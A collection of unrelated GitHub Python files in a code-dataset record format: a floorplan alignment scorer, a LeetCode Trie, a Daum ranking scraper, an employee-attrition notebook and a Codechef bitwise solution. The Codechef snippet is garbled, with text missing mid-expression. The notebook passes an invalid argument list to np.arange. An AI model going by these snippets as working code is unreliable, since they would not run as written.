continue\n # for floor in config['datasets'][dn]['target_floor']:\n # floors.append(floor)\n # target_pairs[dn] = floors\n if data_config['datasets'][dn] is not None and 'target' in data_config['datasets'][dn] and data_config['datasets'][dn]['target']:\n target_pairs[dn] = target_floors\n else:\n for target in targets:\n target_pairs[target] = target_floors\n\n # print target pairs\n for dn in target_pairs:\n logger.info('target pairs: {}'.format(dn))\n for floor in target_pairs[dn]:\n logger.info(' {}'.format(floor))\n\n for data_name in target_pairs:\n target_dir = os.path.join(results_dir, data_name)\n\n tra_fn = os.path.join(datasets_dir, '{}/2dtrajectory.csv'.format(data_name))\n tra_dict = {}\n with open(tra_fn, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n k = row[0]\n x = int(row[1])\n y = int(row[2])\n z = float(row[4]) * pix_per_meter # z will come in meter\n tra_dict[k] = [x, y, z]\n logger.info('load {} trajectory points from {}'.format(len(tra_dict), tra_fn))\n\n meta_fn = os.path.join(datasets_dir, '{}/meta.yaml'.format(data_name))\n with open(meta_fn, 'r') as f:\n meta = yaml.load(f)\n logger.info('load meta data {}'.format(meta_fn))\n\n for floor_fn in meta['floorplans']:\n target_floor_dir = os.path.join(target_dir, os.path.splitext(floor_fn)[0])\n if not os.path.exists(target_floor_dir):\n logger.info('target floor not found: {}'.format(target_floor_dir))\n continue\n logger.info('target floor: {}'.format(floor_fn))\n\n fp_fn = os.path.join(floorplans_dir, floor_fn)\n fp_img = cv2.imread(fp_fn)\n\n # load score\n score_fn_list = glob.glob(os.path.join(target_floor_dir, 'score/*.csv'))\n score_fn_list.sort()\n score_fn_list = score_fn_list[::decimate]\n logger.info('load {} scores'.format(len(score_fn_list)))\n target_tra_dict = {}\n range_x, range_y, range_z = None, None, None\n score_yxz_dict = {}\n floormask_yxz_dict = {}\n score_map_count = None\n\n ## load score map from csv\n score_map_dict = {}\n for score_fn in score_fn_list:\n shot_name = os.path.splitext(os.path.basename(score_fn))[0]+'.png'\n score_map = np.zeros((fp_img.shape[0], fp_img.shape[1], 1), dtype=float)\n # score_map = np.zeros((fp_img.shape[0]//align_voxel_size[1], fp_img.shape[1]//align_voxel_size[0], 1), dtype=float)\n score_map += -1 # for out-range of floormask\n with open(score_fn, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n x = int(row[0])\n y = int(row[1])\n score = float(row[2])\n score_map[int(y-crop_step/2):int(y+crop_step/2), int(x-crop_step/2):int(x+crop_step/2)] = score\n # score_map[(y-crop_step/2)//align_voxel_size[1]:(y+crop_step/2)//align_voxel_size[1], (x-crop_step/2)//align_voxel_size[0]:(x+crop_step/2)//align_voxel_size[0]] = score # center to topleft\n score_map_dict[shot_name] = score_map\n logger.info('load score map from csv')\n\n # create score map of each translation(len(range_y)*len(range_x))\n logger.info('start to create score map of each translation')\n # results = [[] for z in range(len(range_z))]\n\n # calc_score\n def calc_score(arg):\n tra_y = arg[0]\n tra_x = arg[1]\n tra_z = arg[2]\n\n # count number of shots which hit floor\n hit_shot_list = []\n count_yx = np.zeros((fp_img.shape[0], fp_img.shape[1]), dtype=int)\n # floor_voxel_count = 0\n floor_voxel_count = 0\n for score_fn in score_fn_list:\n shot_name = os.path.splitext(os.path.basename(score_fn))[0]+'.png'\n if shot_name not in tra_dict:\n\n continue\n xyz = tra_dict[shot_name]\n # y = (xyz[1] + tra_y) // align_voxel_size[1]\n # x = (xyz[0] + tra_x) // align_voxel_size[0]\n y = ((xyz[1] + tra_y)//crop_step) * crop_step\n x = ((xyz[0] + tra_x)//crop_step) * crop_step\n z = xyz[2] + tra_z\n if not (-align_step[2]/2 < z < align_step[2]/2):\n continue\n if y < 0 or y >= score_map_dict[shot_name].shape[0] or \\\n x < 0 or x >= score_map_dict[shot_name].shape[1] or \\\n score_map_dict[shot_name][y][x] < 0: # out of range\n continue\n\n if count_yx[y, x] == 0:\n floor_voxel_count += 1\n count_yx[y:y+crop_step, x:x+crop_step] += 1\n hit_shot_list.append(shot_name)\n\n # sum scores for each voxel\n score = 0.0\n fire = []\n c = 0\n for shot_name in hit_shot_list:\n xyz = tra_dict[shot_name]\n # y = (xyz[1] + tra_y) // align_voxel_size[1]\n # x = (xyz[0] + tra_x) // align_voxel_size[0]\n y = int(xyz[1] + tra_y)\n x = int(xyz[0] + tra_x)\n s = score_map_dict[shot_name][y][x]\n if s > fire_threshold:\n fire.append(shot_name)\n score += s/float(count_yx[y][x])\n\n # average\n score /= float(floor_voxel_count)\n\n result = {}\n result['x'] = int(tra_x)\n result['y'] = int(tra_y)\n result['z'] = int(tra_z)\n result['score'] = float(score)\n result['in_floor'] = hit_shot_list\n result['fire'] = fire\n\n return result\n\n # get tra_x, tra_y, tra_z\n tra_floor_fn = os.path.join(datasets_dir, '{}/2dtrajectory_{}.csv'.format(data_name, os.path.splitext(floor_fn)[0]))\n tra_floor_dict = {}\n c = 0\n tra_x = 0\n tra_y = 0\n tra_z = 0\n with open(tra_floor_fn, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n k = row[0]\n tra_x += int(row[1]) - tra_dict[k][0]\n tra_y += int(row[2]) - tra_dict[k][1]\n tra_z += float(row[4]) * pix_per_meter - tra_dict[k][2]\n c += 1\n tra_x /= c\n tra_y /= c\n tra_z /= c\n logger.info('translation: ({}, {}, {})'.format(tra_x, tra_y, tra_z))\n result = calc_score([tra_y, tra_x, tra_z])\n\n # save results\n logger.info('creating result dict to save')\n out_info_fn = os.path.join(target_floor_dir, 'actual_score.yaml')\n data = {}\n data['actual'] = result\n with open(out_info_fn, 'w') as f:\n f.write(yaml.dump(data, default_flow_style=False))\n\n # plot data\n # load base image\n fp_img = cv2.imread(fp_fn)\n\n trax = int(result['x'])\n tray = int(result['y'])\n\n # plot trajectory\n for shot in score_fn_list: # here will cause error if DECIMATE is different with align info\n shot = os.path.splitext(os.path.basename(shot))[0] + '.png'\n if shot not in tra_dict:\n continue\n x, y = tra_dict[shot][0] + trax, tra_dict[shot][1] + tray\n\n if y in range(fp_img.shape[0]) and x in range(fp_img.shape[1]):\n if shot in result['fire']:\n cv2.circle(fp_img, (x, y), 5, (0, 0, 255), -1)\n elif shot in result['in_floor']:\n cv2.circle(fp_img, (x, y), 5, (255, 0, 0), -1)\n else:\n cv2.circle(fp_img, (x, y), 5, (0, 0, 0), -1)\n\n # save image file\n out_img_fn = os.path.join(target_floor_dir, 'actual_{}.png'.format(result['z']))\n cv2.imwrite(out_img_fn, fp_img)\n logger.info(\"save {}\".format(out_img_fn))\n break\n\n","repo_name":"iidango/tangologger","sub_path":"manual_alignment/test/alignment/past_scripts/calc_actual_score.py","file_name":"calc_actual_score.py","file_ext":"py","file_size_in_byte":13435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21375216403","text":"#\n# @lc app=leetcode.cn id=208 lang=python3\n#\n# [208] 实现 Trie (前缀树)\n#\n\n# @lc code=start\nclass Trie:\n\n def __init__(self, val=None, end=True):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.children = {}\n self.end = end\n self.val = val\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie.\n \"\"\"\n if not word:\n return\n if word[0] not in self.children:\n self.children[word[0]] = Trie(word[0], len(word) == 1)\n c = self.children[word[0]]\n if len(word) == 1:\n c.end = True\n c.insert(word[1:])\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the trie.\n \"\"\"\n if not word:\n return True\n if word[0] not in self.children:\n return False\n else:\n c = self.children[word[0]]\n if len(word) == 1:\n return c.end\n else:\n return c.search(word[1:])\n\n def startsWith(self, prefix: str) -> bool:\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n \"\"\"\n if not prefix:\n return True\n if prefix[0] not in self.children:\n return False\n else:\n c = self.children[prefix[0]]\n return c.startsWith(prefix[1:])\n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)\n# @lc code=end\n","repo_name":"cuyu/leetcode","sub_path":"208.实现-trie-前缀树.py","file_name":"208.实现-trie-前缀树.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37589624495","text":"import requests\nimport csv\nfrom pprint import pprint\nfrom bs4 import BeautifulSoup\n\ndaum_url = 'https://www.daum.net/'\nresponse = requests.get(daum_url).text\n\ndata = BeautifulSoup(response, 'html.parser')\nrankings = data.select('#mArticle > div.cmain_tmp > div.section_media > div.hotissue_builtin.hide > div.realtime_part > ol > li > div > div:nth-child(1) > span.txt_issue > a') # 여러개(리스트)\n# data.select_one() # 한 개\n\n\n# for idx, rank in enumerate(rankings, 1):\n# print(f'{idx}위 : {rank.text}')\n\n# 데��터를 딕셔너리로 만들기\n# result_dict = {}\n# for idx, rank in enumerate(rankings, 1):\n# result_dict[f'{idx}위'] = rank.text\n# print(result_dict)\n\n# 위에서 만든 데이터로 csv에 저장\n# with open('daum_rank.csv', 'w', newline='', encoding='utf-8') as csvfile:\n# csv_writer = csv.writer(csvfile)\n# for item, rank in result_dict.items():\n# csv_writer.writerow([item, rank])\n\n# 먼저 데이터를 json 데이터처럼 다시 만들기\nresult_list = []\nfor idx, rank in enumerate(rankings, 1):\n result_dict = {'rank': f'{idx}위', 'ranker': rank.text}\n result_list.append(result_dict)\n# pprint(result_list)\n\n# 새로 만든 데이터를 바탕으로 DictWriter 를 사용하기\nwith open('daum_rank.csv', 'w', newline='', encoding='utf-8') as csvfile:\n # 저장할 데이터들의 필드 이름을 미리 지정(딕셔터리의 key 이름과 일치해야 함)\n fieldnames = ['rank', 'ranker']\n csv_writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n # 필드 이름을 csv 파일 최상단에 작성\n csv_writer.writeheader()\n # 리스트를 순회하며 key(csv의 필드)를 통해 value(내용)를 작성한다.ㄴ\n for item in result_list:\n csv_writer.writerow(item)","repo_name":"jung9156/studies","sub_path":"lecture/python/python_csv/daum_ranking.py","file_name":"daum_ranking.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72177150759","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#Background\n\n\n# In[ ]:\n\n\n#McCurr Health Consultancy is an MNC that has thousands of employees spread across the globe. \n#The company believes in hiring the best talent available and retaining them for as long as possible. \n#A huge amount of resources is spent on retaining existing employees through various initiatives. \n#The Head of People Operations wants to bring down the cost of retaining employees. For this, he proposes \n#limiting the incentives to only those employees who are at risk of attrition. As a recently hired Data \n#Scientist in the People Operations Department, you have been asked to identify patterns in characteristics \n#of employees who leave the organization. Also, you have to use this information to predict if an employee \n#is at risk of attrition. This information will be used to target them with incentives.\n\n\n# In[5]:\n\n\n#Objective\n\n\n# In[ ]:\n\n\n#To identify the different factors that drive attrition\n#To build a model to predict if an employee will attrite or not\n\n\n# In[3]:\n\n\n#Dataset Description\n\n\n# In[4]:\n\n\n#The data contains information on employees' demographic details, work-related metrics, and attrition flag.\n\n#EmployeeNumber - Unique Employee Identifier\n#Attrition - Did the employee attrite or not?\n#Age - Age of the employee\n#BusinessTravel - Travel commitments for the job\n#DailyRate - Data description not available\n#Department - Employee's Department\n#DistanceFromHome - Distance from work to home (in KM)\n#Education - Employee's Education. 1-Below College, 2-College, 3-Bachelor, 4-Master, 5-Doctor\n#EducationField - Field of Education\n#EnvironmentSatisfaction - 1-Low, 2-Medium, 3-High, 4-Very High\n#Gender - Employee's gender\n#HourlyRate - Data description not available\n#JobInvolvement - 1-Low, 2-Medium, 3-High, 4-Very High\n#JobLevel - Level of job (1 to 5)\n#JobRole - Job Roles\n#JobSatisfaction - 1-Low, 2-Medium, 3-High, 4-Very High\n#MaritalStatus - Marital Status\n#MonthlyIncome - Monthly Salary\n#MonthlyRate - Data description not available\n#NumCompaniesWorked - Number of companies worked at\n#Over18 - Whether the employee is over 18 years of age?\n#OverTime - Whether the employee is doing overtime?\n#PercentSalaryHike - The percentage increase in the salary last year\n#PerformanceRating - 1-Low, 2-Good, 3-Excellent, 4-Outstanding\n#RelationshipSatisfaction - 1-Low, 2-Medium, 3-High, 4-Very High\n#StandardHours - Standard Hours\n#StockOptionLevel - Stock Option Level\n#TotalWorkingYears - Total years worked\n#TrainingTimesLastYear - Number of training attended last year\n#WorkLifeBalance - 1-Low, 2-Good, 3-Excellent, 4-Outstanding\n#YearsAtCompany - Years at Company\n#YearsInCurrentRole - Years in the current role\n#YearsSinceLastPromotion - Years since the last promotion\n#YearsWithCurrManager - Years with the current manager\n#In the real world, you will not find definitions for some of your variables. \n#It is the part of the analysis to figure out what they might mean.\n\n#Note\n#Kindly do not run the code cells containing Hyperparameter Tuning using GridSearchCV during the session, \n#since they take considerable time to run.\n\n\n# In[2]:\n\n\n#Importing the libraries and overview of the dataset\n\n\n# In[6]:\n\n\nimport pandas as pd\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\n\n# To scale the data using z-score\nfrom sklearn.preprocessing import StandardScaler\n\nfrom sklearn.model_selection import train_test_split\n\n# Algorithms to use\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\n\nfrom sklearn.linear_model import LogisticRegression\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# Metrics to evaluate the model\nfrom sklearn import metrics\n\nfrom sklearn.metrics import confusion_matrix, classification_report, precision_recall_curve,recall_score\n\nfrom sklearn import tree\n\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom sklearn.ensemble import BaggingClassifier\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n# For tuning the model\nfrom sklearn.model_selection import GridSearchCV\n\n# To ignore warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n# In[7]:\n\n\n#Loading the Dataset\n\n\n# In[8]:\n\n\n# Loading the dataset\ndf = pd.read_excel('/Users/yutaoyan/Desktop/HRemployeeGL/HREmployee.xlsx')\n\n\n# In[9]:\n\n\n# Looking at the first 5 records\ndf.head()\n\n\n# In[10]:\n\n\n#Checking the info of the dataset\n\n\n# In[11]:\n\n\n# Let us see the info of the data\ndf.info()\n\n\n# In[12]:\n\n\n#Observations:\n\n#There are 2940 observations and 34 columns in the dataset.\n#All the columns have 2940 non-null values, i.e., there are no missing values in the data.\n\n\n# In[13]:\n\n\n#Let's check the unique values in each column\n\n\n# In[14]:\n\n\n# Checking the count of unique values in each column\ndf.nunique()\n\n\n# In[15]:\n\n\n#Observations:\n\n#Employee number is an identifier which is unique for each employee and we can drop this column as \n#it would not add any value to our analysis.\n#Over18 and StandardHours have only 1 unique value. These columns will not add any value to our model \n#hence we can drop them.\n#Over18 and StandardHours have only 1 unique value. We can drop these columns as they will not add any \n#value to our analysis.\n#On the basis of number of unique values in each column and the data description, we can identify the \n#continuous and categorical columns in the data.\n\n\n#Let's drop the columns mentioned above and define lists for numerical and categorical columns to \n#explore them separately.\n\n\n# In[16]:\n\n\n# Dropping the columns\ndf = df.drop(['EmployeeNumber', 'Over18', 'StandardHours'] , axis = 1)\n\n\n# In[17]:\n\n\n# Creating numerical columns\nnum_cols = ['DailyRate', 'Age', 'DistanceFromHome', 'MonthlyIncome', 'MonthlyRate', 'PercentSalaryHike', 'TotalWorkingYears', \n 'YearsAtCompany', 'NumCompaniesWorked', 'HourlyRate', 'YearsInCurrentRole', 'YearsSinceLastPromotion', \n 'YearsWithCurrManager', 'TrainingTimesLastYear']\n\n# Creating categorical variables\ncat_cols = ['Attrition', 'OverTime', 'BusinessTravel', 'Department', 'Education', 'EducationField', 'JobSatisfaction', 'EnvironmentSatisfaction', \n 'WorkLifeBalance', 'StockOptionLevel', 'Gender', 'PerformanceRating', 'JobInvolvement', 'JobLevel', 'JobRole', 'MaritalStatus', 'RelationshipSatisfaction']\n\n\n# In[56]:\n\n\ndf2 = df.groupby('Attrition').median()\n\n\n# In[57]:\n\n\ndf2[num_cols].style.highlight_max(color=\"lightgreen\")\n\n\n# In[59]:\n\n\ndf = df.drop(['PercentSalaryHike', 'YearsSinceLastPromotion','PerformanceRating', 'HourlyRate'], axis=1)\n\n\n# In[18]:\n\n\n#univariate analysis and data preprocessing and move to the model building section.\n\n\n# In[19]:\n\n\n#Univariate analysis of numerical columns\n\n\n# In[20]:\n\n\n# Checking summary statistics\ndf[num_cols].describe().T\n\n\n# In[21]:\n\n\n#Observations:\n\n#Average employee age is around 37 years. It has a high range, from 18 years to 60, indicating good age \n#diversity in the organization.\n#At least 50% of the employees live within a 7 KM radius of the organization. However, there are some \n#extreme values, given that the maximum value is 29 km.\n#The average monthly income of an employee is USD 6500. It has a high range of values from 1K-20K USD, \n#which is to be expected for any organization's income distribution. There is a big difference between\n#the 3rd quartile value (around USD 8400) and the maximum value (nearly USD 20000), showing that the \n#company's highest earners have a disproportionately large income in comparison to the rest of the \n#employees. Again, this is fairly common in most organizations.\n#The average salary hike of an employee is around 15%. At least 50% of employees got a salary hike of\n#14% or less, with the maximum salary hike being 25%.\n#The average number of years an employee is associated with the company is 7.\n#On average, the number of years since an employee got a promotion is ~2.19. The majority of employees\n#have been promoted since the last year.\n\n\n# In[22]:\n\n\n# Creating histograms\ndf[num_cols].hist(figsize = (14, 14))\n\nplt.show()\n\n\n# In[23]:\n\n\n#Observations:\n\n#The age distribution is close to a normal distribution, with the majority of employees between the ages\n#of 25 and 50.\n#DistanceFromHome also has a right-skewed distribution, meaning most employees live close to work but there \n#are a few that live further away.\n#MonthlyIncome and TotalWorkingYears are skewed to the right, indicating that the majority of workers are in \n#entry / mid-level positions in the organization.\n#The percentage salary hike is skewed to the right, which means employees are mostly getting lower percentage \n#salary increaseS.\n#The YearsAtCompany variable distribution shows a good proportion of workers with 10+ years, indicating a \n#significant number of loyal employees at the organization.\n#The YearsInCurrentRole distribution has three peaks at 0, 2, and 7. There are a few employees that have even \n#stayed in the same role for 15 years and more.\n#The YearsSinceLastPromotion variable distribution indicates that some employees have not received a promotion\n#in 10-15 years and are still working in the organization. These employees are assumed to be high work-experience \n#employees in upper-management roles, such as co-founders, C-suite employees, etc.\n#The distributions of DailyRate, HourlyRate, and MonthlyRate appear to be uniform and do not provide much \n#information. It could be that the daily rate refers to the income earned per extra day worked while the hourly\n#rate could refer to the same concept applied for extra hours worked per day. Since these rates tend to be \n#broadly similar for multiple employees in the same department, that explains the uniform distribution they show.\n\n\n# In[24]:\n\n\n#Univariate analysis for categorical variables\n\n\n# In[25]:\n\n\n# Printing the % sub categories of each category.\nfor i in cat_cols:\n \n print(df[i].value_counts(normalize = True))\n \n print('*' * 40)\n\n\n# In[26]:\n\n\n#Observations:\n#The employee attrition rate is ~16%.\n#Around 28% of the employees are working overtime. This number appears to be on the higher side and might\n#indicate a stressed employee work-life.\n#71% of the employees have traveled rarely, while around 19% have to travel frequently.\n#Around 73% of the employees come from an educational background in the Life Sciences and Medical fields.\n#Over 65% of employees work in the Research & Development department of the organization.\n#Nearly 40% of the employees have low (1) or medium-low (2) job satisfaction and environment satisfaction \n#in the organization, indicating that the morale of the company appears to be somewhat low.\n#Over 30% of the employees show low (1) to medium-low (2) job involvement.\n#Over 80% of the employees either have none or very few stock options.\n#In terms of performance ratings, none of the employees have rated lower than 3 (excellent).\n#About 85% of employees have a performance rating equal to 3 (excellent), while the remaining have a \n#rating of 4 (outstanding). This could either mean that the majority of employees are top performers, \n#or the more likely scenario is that the organization could be highly lenient with its performance appraisal \n#process.\n\n\n# In[27]:\n\n\n#Model Building - Approach\n#Data preparation.\n#Partition the data into a train and test set.\n#Build a model on the train data.\n#Tune the model if required.\n#Test the data on the test set.\n\n\n# In[28]:\n\n\n#Data preparation\n\n\n# In[29]:\n\n\n#Creating dummy variables for the categorical variables\n\n\n# In[30]:\n\n\n# Creating a list of columns for which we will create dummy variables\nto_get_dummies_for = ['BusinessTravel', 'Department', 'EducationField', 'Gender', 'MaritalStatus', 'JobRole']\n\n# Creating dummy variables\ndf = pd.get_dummies(data = df, columns = to_get_dummies_for, drop_first = True) \n\n# Mapping overtime and attrition\ndict_OverTime = {'Yes': 1, 'No': 0}\ndict_attrition = {'Yes': 1, 'No': 0}\n\ndf['OverTime'] = df.OverTime.map(dict_OverTime)\ndf['Attrition'] = df.Attrition.map(dict_attrition)\n\n\n# In[ ]:\n\n\n#Separating the independent variables (X) and the dependent variable (Y)\n\n\n# In[31]:\n\n\n# Separating the target variable and other variables\n\nY = df.Attrition\n\nX = df.drop(['Attrition'], axis = 1)\n\n\n# In[32]:\n\n\n#Splitting the data into 70% train and 30% test set\n\n\n# In[33]:\n\n\n# Splitting the data\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size = 0.3, random_state = 1, stratify = Y)\n\n\n# In[34]:\n\n\n# Creating metric function\n\ndef metrics_score(actual, predicted):\n \n print(classification_report(actual, predicted))\n \n cm = confusion_matrix(actual, predicted)\n \n plt.figure(figsize = (8, 5))\n \n sns.heatmap(cm, annot = True, fmt = '.2f', xticklabels = ['Not Attriate', 'Attriate'], yticklabels = ['Not Attriate', 'Attriate'])\n \n plt.ylabel('Actual')\n \n plt.xlabel('Predicted')\n \n plt.show()\n\n\n# In[35]:\n\n\n# Building decision tree model\ndt = DecisionTreeClassifier(class_weight = {0: 0.17, 1: 0.83}, random_state = 1)\n\n\n# In[36]:\n\n\n# Fitting decision tree model\ndt.fit(x_train, y_train)\n\n\n# In[37]:\n\n\n# Checking performance on the training dataset\ny_train_pred_dt = dt.predict(x_train)\n\nmetrics_score(y_train, y_train_pred_dt)\n\n\n# In[38]:\n\n\n#Observation:\n\n#The Decision tree is giving a 100% score for all metrics on the training dataset.\n\n\n# In[39]:\n\n\n# Checking performance on the test dataset\ny_test_pred_dt = dt.predict(x_test)\n\nmetrics_score(y_test, y_test_pred_dt)\n\n\n# In[60]:\n\n\nnp.round(dt.feature_importances_, 4)\n\n\n# In[40]:\n\n\n# Plot the feature importance\n\nimportances = dt.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance,importance_df.index)\n\n\n# In[41]:\n\n\n# Choose the type of classifier\ndtree_estimator = DecisionTreeClassifier(class_weight = {0: 0.17, 1: 0.83}, random_state = 1)\n\n# Grid of parameters to choose from\nparameters = {'max_depth': np.arange(4,5,6,7), \n 'criterion': ['gini', 'entropy'],\n 'min_samples_leaf': [5, 10, 20, 25]\n }\n\n# Type of scoring used to compare parameter combinations\nscorer = metrics.make_scorer(recall_score, pos_label = 1)\n\n# Run the grid search\ngridCV = GridSearchCV(dtree_estimator, parameters, scoring = scorer, cv = 10)\n\n# Fitting the grid search on the train data\ngridCV = gridCV.fit(x_train, y_train)\n\n# Set the classifier to the best combination of parameters\ndtree_estimator = gridCV.best_estimator_\n\n# Fit the best estimator to the data\ndtree_estimator.fit(x_train, y_train)\n\n\n# In[61]:\n\n\ngridCV.best_params_\n\n\n# In[42]:\n\n\n# Checking performance on the training dataset\ny_train_pred_dt = dtree_estimator.predict(x_train)\n\nmetrics_score(y_train, y_train_pred_dt)\n\n\n# In[43]:\n\n\n# Checking performance on the test dataset\ny_test_pred_dt = dtree_estimator.predict(x_test)\n\nmetrics_score(y_test, y_test_pred_dt)\n\n\n# In[44]:\n\n\nimportances = dtree_estimator.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance, importance_df.index)\n\n\n# In[45]:\n\n\nfeatures = list(X.columns)\n\nplt.figure(figsize = (30, 20))\n\ntree.plot_tree(dt, max_depth = 4, feature_names = features, filled = True, fontsize = 12, node_ids = True, class_names = True)\n\nplt.show()\n\n\n# #Fitting the Random Forest classifier on the training data\n# rf_estimator = RandomForestClassifier(n_estimators=500, class_weight = \"balanced\", random_state = 1, max_depth=2)\n# \n# rf_estimator.fit(x_train, y_train)\n\n# In[64]:\n\n\n# Fitting the Random Forest classifier on the training data\nrf_estimator = RandomForestClassifier(n_estimators=500, class_weight = \"balanced\", random_state = 1, max_depth=2)\nrf_estimator.fit(x_train, y_train)\n\n\n# In[47]:\n\n\n# Checking performance on the training data\ny_pred_train_rf = rf_estimator.predict(x_train)\n\nmetrics_score(y_train, y_pred_train_rf)\n\n\n# In[48]:\n\n\n# Checking performance on the testing data\ny_pred_test_rf = rf_estimator.predict(x_test)\n\nmetrics_score(y_test, y_pred_test_rf)\n\n\n# In[49]:\n\n\nimportances = rf_estimator.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance, importance_df.index)\n\n\n# In[69]:\n\n\n# Choose the type of classifier\nrf_estimator_tuned = RandomForestClassifier(class_weight =\"balanced\", random_state = 1)\n\n# Grid of parameters to choose from\nparams_rf = { \"max_depth\": [2,3,4,5,6],\n \"n_estimators\": [100, 250, 500],\n \"min_samples_leaf\": np.arange(1, 4, 1),\n \"max_features\": ['log2', 'auto'],\n}\n\n\n# Type of scoring used to compare parameter combinations - recall score for class 1\nscorer = \"recall\"\n\n# Run the grid search\ngrid_obj = GridSearchCV(rf_estimator_tuned, params_rf, scoring = \"recall\", cv = 3, n_jobs=-1)\n\ngrid_obj2 = grid_obj.fit(x_train, y_train)\n\n# Set the classifier to the best combination of parameters\nrf_estimator_tuned = grid_obj2.best_estimator_\n\n\n# In[66]:\n\n\nrf_estimator_tuned.fit(x_train, y_train)\n\n\n# In[67]:\n\n\n# Checking performance on the training data\ny_pred_train_rf_tuned = rf_estimator_tuned.predict(x_train)\n\nmetrics_score(y_train, y_pred_train_rf_tuned)\n\n\n# In[68]:\n\n\n# Plotting feature importance\nimportances = rf_estimator_tuned.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance, importance_df.index)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Hangzhouer22/machine-learning","sub_path":"machine learning employee attrition.py","file_name":"machine learning employee attrition.py","file_ext":"py","file_size_in_byte":17878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34357820830","text":"import random\ndef bruteForce(x,y,l,r):\n maxVal = -1\n zMax = 0\n for num in range(l, r+1):\n temp = F(x,y,num)\n if temp > maxVal:\n maxVal = temp\n zMax = num\n return zMax\nclass Bit:\n def setBit(self, num, pos):\n return num|(1<0:\n pos-=1\n currMax = float(\"-inf\")\n z = 0\n possibleValues = [l,r]\n for posForZ1 in range(pos-1, -1, -1):\n if bitObj.getBit(l, posForZ1):\n continue\n z1 = bitObj.setBit(l, posForZ1)\n for rest in range(posForZ1-1, -1, -1):\n if bitObj.getBit(x, rest) or bitObj.getBit(y, rest):#to minimize the value\n z1 = bitObj.setBit(z1, rest)\n else:\n z1 = bitObj.unsetBit(z1, rest)\n possibleValues.append(z1)\n for posForZ2 in range(pos-1, -1, -1):\n if not bitObj.getBit(r, posForZ2):\n continue\n z2 = bitObj.unsetBit(r, posForZ2)#unsetting the bit to make it less than r\n for rest in range(posForZ2-1, -1, -1):\n if bitObj.getBit(x, rest) or bitObj.getBit(y, rest):#to minimize the value\n z2 = bitObj.setBit(z2, rest)\n else:\n z2 = bitObj.unsetBit(z2, rest)\n possibleValues.append(z2)\n possibleValues.sort()\n for num in possibleValues:\n value = F(x,y, num)\n if value > currMax:\n z = num\n currMax = value\n # if z!= bruteForce(x,y,l,r):\n print(z)\n # break\n\n#\n#\n","repo_name":"subho2107/Codechef","sub_path":"May long challenge/chef and bitwise product.py","file_name":"chef and bitwise product.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12626981494","text":"def paralleltomo(*args):\r\n#PARALLELTOMO Creates a 2D tomography system matrix using parallel beams\r\n#\r\n# [A,theta,p,d] = paralleltomo(N)\r\n# [A,theta,p,d] = paralleltomo(N,theta)\r\n# [A,theta,p,d] = paralleltomo(N,theta,p)\r\n# [A,theta,p,d] = paralleltomo(N,theta,p,d)\r\n#\r\n# This function creates a 2D tomography test problem with an N-times-N\r\n# domain, using p parallel rays for each angle in the vector theta.\r\n#\r\n# Input: \r\n# N Scalar denoting the number of discretization intervals in \r\n# each dimesion, such that the domain consists of N^2 cells.\r\n# theta Vector containing the angles in degrees. Default: theta = \r\n# 0:1:179.\r\n# p Number of parallel rays for each angle. Default: p =\r\n# round(sqrt(2)*N).\r\n# d Scalar denoting the distance from the first ray to the last.\r\n# Default: d = sqrt(2)*N.\r\n#\r\n# Output:\r\n# A Coefficient matrix with N^2 columns and nA*p rows, \r\n# where nA is the number of angles, i.e., length(theta).\r\n# theta Vector containing the used angles in degrees.\r\n# p The number of used rays for each angle.\r\n# d The distance between the first and the last ray.\r\n# \r\n# See also: fanbeamtomo, seismictomo.\r\n\r\n#Anders Nymark Christensen, 20180216, DTU Compute\r\n#Revised from the matlab version by:\r\n \r\n# Jakob Sauer Jørgensen, Maria Saxild-Hansen and Per Christian Hansen,\r\n# October 1, 201r, DTU Compute.\r\n\r\n# Reference: A. C. Kak and M. Slaney, Principles of Computerized \r\n# Tomographic Imaging, 